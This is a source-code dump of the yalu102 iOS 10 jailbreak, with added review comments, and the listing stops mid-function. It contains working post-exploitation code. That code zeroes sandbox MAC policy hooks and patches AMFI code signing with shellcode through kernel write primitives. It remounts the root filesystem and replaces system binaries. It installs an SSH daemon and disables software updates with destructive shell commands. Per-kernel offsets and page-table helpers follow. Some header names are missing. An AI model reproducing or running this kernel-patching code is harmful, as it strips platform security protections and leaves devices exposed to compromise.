WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); 757 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 758 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); 759 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, 
mpo_vnode_check_access)), 0); 760 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_chroot)), 0); 761 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_create)), 0); 762 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_deleteextattr)), 0); 763 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exchangedata)), 0); 764 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_exec)), 0); 765 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattrlist)), 0); 766 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getextattr)), 0); 767 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_ioctl)), 0); 768 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_link)), 0); 769 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_listextattr)), 0); 770 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_open)), 0); 771 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_readlink)), 0); 772 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setattrlist)), 0); 773 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setextattr)), 0); 774 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setflags)), 0); 775 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setmode)), 0); 776 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setowner)), 0); 777 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 778 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_setutimes)), 0); 779 | 
WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_stat)), 0); 780 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_truncate)), 0); 781 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_unlink)), 0); 782 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_notify_create)), 0); 783 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_fsgetpath)), 0); 784 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_getattr)), 0); 785 | WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_mount_check_stat)), 0); 786 | 787 | } 788 | 789 | { 790 | uint64_t point = find_amfiret()-0x18; 791 | 792 | RemapPage((point & (~PMK))); 793 | uint64_t remap = NewPointer(point); 794 | 795 | assert(ReadAnywhere32(point) == ReadAnywhere32(remap)); 796 | 797 | WriteAnywhere32(remap, 0x58000041); 798 | WriteAnywhere32(remap + 4, 0xd61f0020); 799 | WriteAnywhere64(remap + 8, shc+0x200); /* amfi shellcode */ 800 | 801 | } 802 | 803 | for (int i = 0; i < z; i++) { 804 | WriteAnywhere64(plist[i], physcode + 0x100); 805 | } 806 | 807 | while (ReadAnywhere32(kernvers+whole_base-4) != 1) { 808 | sleep(1); 809 | } 810 | 811 | NSLog(@"enabled patches"); 812 | 813 | { 814 | // mount patch 815 | extern uint64_t rootvnode_offset; 816 | uint64_t rootfs_vnode = ReadAnywhere64(rootvnode_offset + kernbase); 817 | 818 | struct utsname uts; 819 | uname(&uts); 820 | 821 | vm_offset_t off = 0xd8; 822 | if (strstr(uts.version, "16.0.0")) { 823 | off = 0xd0; 824 | } 825 | 826 | uint64_t v_mount = ReadAnywhere64(rootfs_vnode+off); 827 | 828 | uint32_t v_flag = ReadAnywhere32(v_mount + 0x71); 829 | 830 | WriteAnywhere32(v_mount + 0x71, v_flag & (~(0x1<<6))); 831 | 832 | char* nmz = strdup("/dev/disk0s1s1"); 833 | int lolr = mount( "hfs", "/", MNT_UPDATE, (void*)&nmz); 834 | NSLog(@"remounting: %d", lolr); 835 | 836 | v_mount 
= ReadAnywhere64(rootfs_vnode+off); 837 | 838 | WriteAnywhere32(v_mount + 0x71, v_flag); 839 | } 840 | 841 | { 842 | char path[256]; 843 | uint32_t size = sizeof(path); 844 | _NSGetExecutablePath(path, &size); 845 | char* pt = realpath(path, 0); 846 | 847 | { 848 | __block pid_t pd = 0; 849 | NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; 850 | 851 | 852 | int f = open("/.installed_yaluX", O_RDONLY); 853 | 854 | if (f == -1) { 855 | NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; 856 | NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; 857 | const char* jl = [tar UTF8String]; 858 | 859 | unlink("/bin/tar"); 860 | unlink("/bin/launchctl"); 861 | 862 | copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); 863 | chmod("/bin/tar", 0777); 864 | jl="/bin/tar"; // 865 | 866 | chdir("/"); 867 | 868 | posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "--no-overwrite-dir", "-xvf", [bootstrap UTF8String], NULL}, NULL); 869 | NSLog(@"pid = %x", pd); 870 | waitpid(pd, 0, 0); 871 | 872 | 873 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; 874 | jl = [jlaunchctl UTF8String]; 875 | 876 | copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); 877 | chmod("/bin/launchctl", 0755); 878 | 879 | open("/.installed_yaluX", O_RDWR|O_CREAT); 880 | open("/.cydia_no_stash",O_RDWR|O_CREAT); 881 | 882 | 883 | system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); 884 | system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); 885 | 886 | system("/usr/bin/uicache"); 887 | 888 | system("killall -SIGSTOP cfprefsd"); 889 | NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; 890 | 891 | [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; 892 | 893 | [md 
writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; 894 | system("killall -9 cfprefsd"); 895 | 896 | } 897 | { 898 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; 899 | char* jl = [jlaunchctl UTF8String]; 900 | unlink("/usr/libexec/reload"); 901 | copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); 902 | chmod("/usr/libexec/reload", 0755); 903 | chown("/usr/libexec/reload", 0, 0); 904 | 905 | } 906 | { 907 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; 908 | char* jl = [jlaunchctl UTF8String]; 909 | unlink("/Library/LaunchDaemons/0.reload.plist"); 910 | copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); 911 | chmod("/Library/LaunchDaemons/0.reload.plist", 0644); 912 | chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); 913 | } 914 | { 915 | NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"dropbear.plist"]; 916 | char* jl = [jlaunchctl UTF8String]; 917 | unlink("/Library/LaunchDaemons/dropbear.plist"); 918 | copyfile(jl, "/Library/LaunchDaemons/dropbear.plist", 0, COPYFILE_ALL); 919 | chmod("/Library/LaunchDaemons/dropbear.plist", 0644); 920 | chown("/Library/LaunchDaemons/dropbear.plist", 0, 0); 921 | } 922 | unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); 923 | 924 | } 925 | } 926 | chmod("/private", 0777); 927 | chmod("/private/var", 0777); 928 | chmod("/private/var/mobile", 0777); 929 | chmod("/private/var/mobile/Library", 0777); 930 | chmod("/private/var/mobile/Library/Preferences", 0777); 931 | system("rm -rf /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; touch /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chmod 000 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate; chown 0:0 /var/MobileAsset/Assets/com_apple_MobileAsset_SoftwareUpdate"); 932 | system("(echo 'really jailbroken'; /bin/launchctl load 
/Library/LaunchDaemons/0.reload.plist)&");
    WriteAnywhere64(bsd_task+0x100, orig_cred);
    sleep(2);

    NSLog(@"done");
}
--------------------------------------------------------------------------------
/yalu102/launchctl:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/launchctl
--------------------------------------------------------------------------------
/yalu102/main.m:
--------------------------------------------------------------------------------
//
//  main.m
//  yalu102
//
//  Created by qwertyoruiop on 05/01/2017.
//  Copyright © 2017 kimjongcracks. All rights reserved.
//

// NOTE(review): the header name after this #import is missing on the page.
#import
#import "AppDelegate.h"

// UIKit entry point: hands argc/argv to UIApplicationMain with AppDelegate as
// the application delegate class and returns whatever that call returns.
int main(int argc, char * argv[]) {
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
    }
}
--------------------------------------------------------------------------------
/yalu102/offsets.c:
--------------------------------------------------------------------------------
// NOTE(review): the four header names below are missing on the page. The code
// uses uname(), printf(), strcmp() and uint64_t, so the matching system
// headers are needed for this file to build.
#include
#include
#include
#include

#include "offsets.h"

// Offsets chosen by init_offsets(). kernproc_offset is defined here but never
// assigned in this file; procoff is defined here but not declared in offsets.h.
uint64_t allproc_offset;
uint64_t kernproc_offset;
uint64_t procoff;
uint64_t rootvnode_offset;

/*
 * Select the hard-coded, per-build kernel offsets used by the rest of the tool.
 *
 * Prints the uname() fields, assigns a default set of offsets, then compares
 * u.version against a fixed list of exact kernel version strings. On a match
 * it overwrites allproc_offset and rootvnode_offset. procoff is only ever set
 * by the default assignment (0x360).
 *
 * NOTE(review): when no string matches, the function prints a message and
 * returns with the defaults still in place. It returns void, so callers cannot
 * tell a matched build from an unmatched one. The defaults are the same values
 * as the S8000 16.0.0 / 16.1.0 branches, and the message text suggests a crash
 * is expected on any other kernel.
 * NOTE(review): the return value of uname() is not checked.
 * NOTE(review): matching is by exact string equality. This page collapses runs
 * of whitespace, so a literal such as "Fri Aug 5" may have had two spaces in
 * the original file; verify against the repository before relying on it.
 */
void init_offsets() {
    struct utsname u = { 0 };
    uname(&u);

    printf("sysname: %s\n", u.sysname);
    printf("nodename: %s\n", u.nodename);
    printf("release: %s\n", u.release);
    printf("version: %s\n", u.version);
    printf("machine: %s\n", u.machine);

    // Defaults, used unchanged whenever no version string below matches.
    allproc_offset = 0x5a4148;
    procoff = 0x360;
    rootvnode_offset = 0x5aa0b8;

    /*
     Offsets shared by:
     - @qwertyoruiop
     - @Mila432
     - @Andywiik
     - @nicogibbons
     - @jtv7
     - @onchehuh
     */

    if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7001") == 0) {
        allproc_offset = 0x5b8528;
        rootvnode_offset = 0x5be0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b8468;
        rootvnode_offset = 0x5be0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S8000") == 0) {
        allproc_offset = 0x5a8438;
        rootvnode_offset = 0x5ae0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:09 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_S5L8960X") == 0) {
        allproc_offset = 0x5ac418;
        rootvnode_offset = 0x5b20b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 21:40:08 PST 2016; root:xnu-3789.32.1~4/RELEASE_ARM64_T8010") == 0) {
        allproc_offset = 0x5ec478;
        rootvnode_offset = 0x5f20b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Mon Dec 19 19:56:48 PST 2016; root:xnu-3789.43.2~1/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b8468;
        rootvnode_offset = 0x5be0b8;
    }//apple tv 4
    else if (strcmp(u.version, "Darwin Kernel Version 16.3.0: Tue Nov 29 20:25:47 PST 2016; root:xnu-3789.33.1~1/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b8468;
        rootvnode_offset = 0x5be0b8;
    }//apple tv 4
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 22:13:19 PDT 2016; root:xnu-3789.23.3~2/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b4168;
        rootvnode_offset = 0x5ba0b8;
    }//apple tv 4
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:10 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T8010") == 0) {
        allproc_offset = 0x5ec178;
        rootvnode_offset = 0x5f20b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7001") == 0) {
        allproc_offset = 0x5b4228;
        rootvnode_offset = 0x5ba0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b4168;
        rootvnode_offset = 0x5ba0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:12 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S8000") == 0) {
        allproc_offset = 0x5a4148;
        rootvnode_offset = 0x5aa0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.1.0: Thu Sep 29 21:56:11 PDT 2016; root:xnu-3789.22.3~1/RELEASE_ARM64_S5L8960X") == 0) {
        allproc_offset = 0x5a4128;
        rootvnode_offset = 0x5aa0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T8010") == 0) {
        allproc_offset = 0x5ec178;
        rootvnode_offset = 0x5f20b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7001") == 0) {
        allproc_offset = 0x5b0228;
        rootvnode_offset = 0x5b60b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_T7000") == 0) {
        allproc_offset = 0x5b0168;
        rootvnode_offset = 0x5b60b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:54 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S8000") == 0) {
        allproc_offset = 0x5a4148;
        rootvnode_offset = 0x5aa0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Sun Aug 28 20:36:55 PDT 2016; root:xnu-3789.2.4~3/RELEASE_ARM64_S5L8960X") == 0) {
        allproc_offset = 0x5a4128;
        rootvnode_offset = 0x5aa0b8;
    }
    else if (strcmp(u.version, "Darwin Kernel Version 16.0.0: Fri Aug 5 22:15:30 PDT 2016; root:xnu-3789.1.24~11/RELEASE_ARM64_S5L8960X") == 0) {
        allproc_offset = 0x5a4128;
        rootvnode_offset = 0x5aa0b8;
    }//some beta ios
    else {
        // No failure indication reaches the caller; the defaults stay in effect.
        printf("missing offset, prob crashing\n");
    }
}
--------------------------------------------------------------------------------
/yalu102/offsets.h:
--------------------------------------------------------------------------------
#ifndef offsets_h
#define offsets_h

// NOTE(review): the header name after this #import is missing on the page.
#import

// NOTE(review): offsets.c as listed defines only allproc_offset,
// kernproc_offset, procoff and rootvnode_offset. The struct_* externs below
// have no definition in that file, so any use of them depends on a definition
// elsewhere in the project. Confirm before referencing them.

// offsets from the main kernel 0xfeedfacf
extern uint64_t allproc_offset;
extern uint64_t kernproc_offset;

// offsets in struct proc
extern uint64_t struct_proc_p_pid_offset;
extern uint64_t struct_proc_task_offset;
extern uint64_t struct_proc_p_uthlist_offset;
extern uint64_t struct_proc_p_ucred_offset;
extern uint64_t struct_proc_p_comm_offset;

// offsets in struct kauth_cred
extern uint64_t struct_kauth_cred_cr_ref_offset;

// offsets in struct uthread
extern uint64_t struct_uthread_uu_ucred_offset;
extern uint64_t struct_uthread_uu_list_offset;

// offsets in struct task
extern uint64_t struct_task_ref_count_offset;
extern uint64_t struct_task_itk_space_offset;

// offsets in struct ipc_space
extern uint64_t struct_ipc_space_is_table_offset;

// offsets in struct ipc_port
extern uint64_t struct_ipc_port_ip_kobject_offset;

// Fills in allproc_offset and rootvnode_offset (and procoff) for the running
// kernel build; see offsets.c.
void init_offsets();
extern uint64_t rootvnode_offset;

#endif
--------------------------------------------------------------------------------
/yalu102/patchfinder64.h:
--------------------------------------------------------------------------------
//
//  patchfinder64.h
//
//  Created by qwertyoruiop on 21/09/16.
//  Copyright © 2016 qwertyoruiop. All rights reserved.
//

#ifndef patchfinder64_h
#define patchfinder64_h

// NOTE(review): the header name after this #import is missing on the page.
#import

/*
 * Interface to the kernel patchfinder. Only declarations are visible here:
 * the listing provides patchfinder64.o as a prebuilt object with no source,
 * so nothing about the behaviour of these symbols can be checked from this
 * page. Remarks on what a function does are inferred from its name and are
 * marked as such.
 */

// Base/size pairs; presumably the kernel's executable text and prelinked
// kext text ranges, set through set_text_exec()/set_prelink_exec(). TODO confirm.
extern uint64_t text_exec_base;
extern uint64_t text_exec_size;

extern uint64_t prelink_exec_base;
extern uint64_t prelink_exec_size;

// Presumably the address range and local buffer of a dumped kernel image,
// set through set_dump(). TODO confirm.
extern uint64_t whole_base;
extern uint64_t whole_size;
extern uint8_t* whole_dump;
extern uint64_t find_register_value(uint32_t* opcodes, uint64_t offset, uint64_t opcode_base, uint8_t reg);
extern uint64_t find_reference(uint32_t* opcodes, size_t opcode_size, uint64_t opcode_base, uint64_t target);
// Selects which of the two executable ranges get_data_for_mode() works on.
enum Search {
    SearchTextExec,
    SearchPrelinkExec
};
extern char uref;
extern uint64_t get_data_for_mode(uint64_t offset, enum Search mode);



void set_text_exec(uint64_t text_exec_base_,uint64_t text_exec_size_);
void set_prelink_exec(uint64_t prelink_exec_base_, uint64_t prelink_exec_size_);
void set_dump(uint64_t whole_base_,uint64_t whole_size_, uint8_t* whole_dump_);
// The find_* functions each return a uint64_t. Going by the names, that value
// is the kernel address of the named symbol or patch site (pmap, AMFI, LWVM,
// sandbox ops, CPACR write); what is returned on failure is not documented
// here. They are declared with empty parentheses, which in C leaves the
// parameter list unspecified rather than declaring "no arguments".
uint64_t find_kernel_pmap();
uint64_t find_gPhysBase();
uint64_t find_flushcache();
uint64_t find_amfi_memcmpstub();
uint64_t find_memwithphys();
uint64_t find_kernel_mount();
uint64_t find_vnode_lookup();
uint64_t find_cpu_list();
uint64_t find_cpacr_write();
uint64_t find_lwvm_mapio_patch();
uint64_t find_lwvm_mapio_newj();
uint64_t find_ret_non0();
uint64_t find_ret_0();
uint64_t find_amfiret();
uint64_t find_sbops();
// Code-signing status flags. The names and values appear to mirror XNU's
// code-signing header; where they are used is not visible on this page.
#define CS_VALID 0x0000001 /* dynamically valid */
#define CS_ADHOC 0x0000002 /* ad hoc signed */
#define CS_GET_TASK_ALLOW 0x0000004 /* has get-task-allow entitlement */
#define CS_INSTALLER 0x0000008 /* has installer entitlement */

#define CS_HARD 0x0000100 /* don't load invalid pages */
#define CS_KILL 0x0000200 /* kill process if it becomes invalid */
#define CS_CHECK_EXPIRATION 0x0000400 /* force expiration checking */
#define CS_RESTRICT 0x0000800 /* tell dyld to treat restricted */
#define CS_ENFORCEMENT 0x0001000 /* require enforcement */
#define CS_REQUIRE_LV 0x0002000 /* require library validation */
#define CS_ENTITLEMENTS_VALIDATED 0x0004000

#define CS_ALLOWED_MACHO 0x00ffffe

#define CS_EXEC_SET_HARD 0x0100000 /* set CS_HARD on any exec'ed process */
#define CS_EXEC_SET_KILL 0x0200000 /* set CS_KILL on any exec'ed process */
#define CS_EXEC_SET_ENFORCEMENT 0x0400000 /* set CS_ENFORCEMENT on any exec'ed process */
#define CS_EXEC_SET_INSTALLER 0x0800000 /* set CS_INSTALLER on any exec'ed process */

#define CS_KILLED 0x1000000 /* was killed by kernel for invalidity */
#define CS_DYLD_PLATFORM 0x2000000 /* dyld used to load this is a platform binary */
#define CS_PLATFORM_BINARY 0x4000000 /* this is a platform binary */
#define CS_PLATFORM_PATH 0x8000000 /* platform binary by the fact of path (osx only) */
#endif /* patchfinder64_h */
--------------------------------------------------------------------------------
/yalu102/patchfinder64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/patchfinder64.o
--------------------------------------------------------------------------------
/yalu102/pte_stuff.h:
--------------------------------------------------------------------------------
#ifndef pte_stuff_h
#define pte_stuff_h


/*
 * Translation-table-entry (TTE) helpers.
 *
 * Each entry is 1 << TTE_INDEX_SHIFT = 8 bytes, so TTE_INDEX() turns a
 * per-level index bitfield into a byte offset within a table.
 *
 * NOTE(review): macro arguments are not parenthesised in TTE_GET and TTE_SET,
 * and TTE_SETB / TTE_SET expand to bare assignments, so they are only safe
 * with simple lvalues and simple operands, used as whole statements.
 */
#define TTE_INDEX_SHIFT 3
#define TTE_SIZE (1 << TTE_INDEX_SHIFT)
#define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT)
#define TTE_GET(tte, mask) (tte & mask)
#define TTE_SETB(tte, mask) tte = tte | mask
#define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask))
#define TTE_IS_VALID_MASK 0x1
#define TTE_IS_TABLE_MASK 0x2
#define TTE_BLOCK_ATTR_INDEX_MASK 0x1C
#define TTE_BLOCK_ATTR_NS_MASK 0x20
#define TTE_BLOCK_ATTR_AP_MASK 0xC0
#define TTE_BLOCK_ATTR_AP_RO_MASK 0x80
#define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40
#define TTE_BLOCK_ATTR_SH_MASK 0x300
#define TTE_BLOCK_ATTR_AF_MASK 0x400
#define TTE_BLOCK_ATTR_NG_MASK 0x800
// Output-address field of an entry: bits 12..47.
#define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL
#define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52)
#define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53)
#define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54)
// Linear kernel virtual <-> physical conversion using the two bases below.
// The macro arguments are not parenthesised.
#define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase)
#define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase)
// NOTE(review): this header defines variables and non-static functions.
// isvad, sz and every function below are full definitions, so including the
// header from more than one translation unit gives duplicate symbols. It also
// includes nothing itself: uname, host_page_size, NSLog, ReadAnywhere64, tfp0
// and mach_vm_allocate must all be declared by the includer.
uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess;

// Virtual address split for a 4 KiB translation granule:
// 12 + 9 + 9 + 9 + 9 + 16 = 64 bits.
typedef union VMA_4K {
    struct {
        uint64_t block_off : 12;
        uint64_t level3_index : 9;
        uint64_t level2_index : 9;
        uint64_t level1_index : 9;
        uint64_t level0_index : 9;
        uint64_t ttbr_selector : 16;
    } __attribute__((packed)) vm_info;
    uint64_t vmaddr;
} VMA_4K;
// Virtual address split for a 16 KiB translation granule:
// 14 + 11 + 11 + 11 + 1 + 16 = 64 bits.
typedef union VMA_16K {
    struct {
        uint64_t block_off : 14;
        uint64_t level3_index : 11;
        uint64_t level2_index : 11;
        uint64_t level1_index : 11;
        uint64_t level0_index : 1;
        uint64_t ttbr_selector : 16;
    } __attribute__((packed)) vm_info;
    uint64_t vmaddr;
} VMA_16K;

VMA_16K vad16;
VMA_4K vad4;
char isvad = 0; // set to 1 by checkvad() when the page size is 4096

#define TTELog NSLog
vm_size_t sz = 0; // cached page size; 0 means "not determined yet"

/*
 * Determine the page size once and cache it in sz; set isvad when it is 4 KiB.
 *
 * Does nothing if sz is already non-zero. Otherwise asks host_page_size(),
 * then forces 4096 when the machine string starts with "iPad5,".
 *
 * NOTE(review): the return values of uname() and host_page_size() are ignored;
 * a failure is only caught by assert(sz), which disappears under NDEBUG.
 * NOTE(review): sz is a vm_size_t but is logged with %x; on 64-bit targets
 * the format specifier and argument width do not match.
 */
void checkvad() {
    if (!sz) {
        struct utsname u = { 0 };
        uname(&u);
        host_page_size(mach_host_self(), &sz);
        NSLog(@"checkvad: %x %x", sz, getpagesize());
        // strstr(...) == u.machine is a "starts with" test.
        if (strstr(u.machine, "iPad5,") == u.machine) {
            sz = 4096; // this is 4k but host_page_size lies to us
        }
        assert(sz);
        if (sz == 4096) {
            isvad = 1;
        }
    }
}
/*
 * Log the decoded fields of one translation table entry: output address,
 * table/valid bits, UXN/PXN, contiguous, nG, access flag, shareability and
 * the two access-permission bits. Purely diagnostic; tte is not modified.
 */
void parse_block_tte(uint64_t tte) {
    TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK));
    TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK)));
    TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK)));
    TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK)));
    TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK)));
    TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK)));
    TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK)));
    TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK)));
    TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8));
    TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write");
    TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page");
}

/*
 * Walk the translation tables for vmaddr, calling the block at every level
 * visited.
 *
 * vmaddr                 virtual address to look up
 * pagestuff_64_callback  called as (address of the entry, level); the second
 *                        block parameter is named "addr" but receives the level
 * table                  virtual address of the table for this level;
 *                        0 selects level1_table
 * level                  level of `table`; 0 is replaced by 1, so the
 *                        `case 0` arms below cannot be reached through this
 *                        entry point
 *
 * After the callback, the entry is read with ReadAnywhere64(). If its table
 * bit is set and level is not 3, the function recurses into the next-level
 * table, converting the entry's physical address to virtual with
 * (- gPhysBase + gVirtBase).
 *
 * NOTE(review): if sz is neither 4096 nor 16384, or level is outside 0..3,
 * tteaddr stays 0 and is still handed to the callback and to ReadAnywhere64().
 * NOTE(review): the valid bit is never tested before the table bit is used.
 */
void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) {

    checkvad();
    if (!table) table = level1_table;
    if (!level) level = 1;

    vm_address_t tteaddr = 0;



    if (sz == 4096) {
        VMA_4K target_addr;
        target_addr.vmaddr = vmaddr;

        if (level == 1) {
            // Rebases the 9-bit level-1 index by 0x1c0. The reason is not
            // stated; presumably level1_table begins at that entry. TODO confirm.
            target_addr.vm_info.level1_index -= 0x1c0;
        }

        switch (level) {
            case 0:
                tteaddr = table + TTE_INDEX(target_addr, level0);
                break;
            case 1:
                tteaddr = table + TTE_INDEX(target_addr, level1);
                break;

            case 2:
                tteaddr = table + TTE_INDEX(target_addr, level2);
                break;

            case 3:
                tteaddr = table + TTE_INDEX(target_addr, level3);
                break;

            default:
                break;
        }

    } else if (sz == 4096*4) {
        VMA_16K target_addr;
        target_addr.vmaddr = vmaddr;

        switch (level) {
            case 0:
                tteaddr = table + TTE_INDEX(target_addr, level0);
                break;
            case 1:
                tteaddr = table + TTE_INDEX(target_addr, level1);
                break;

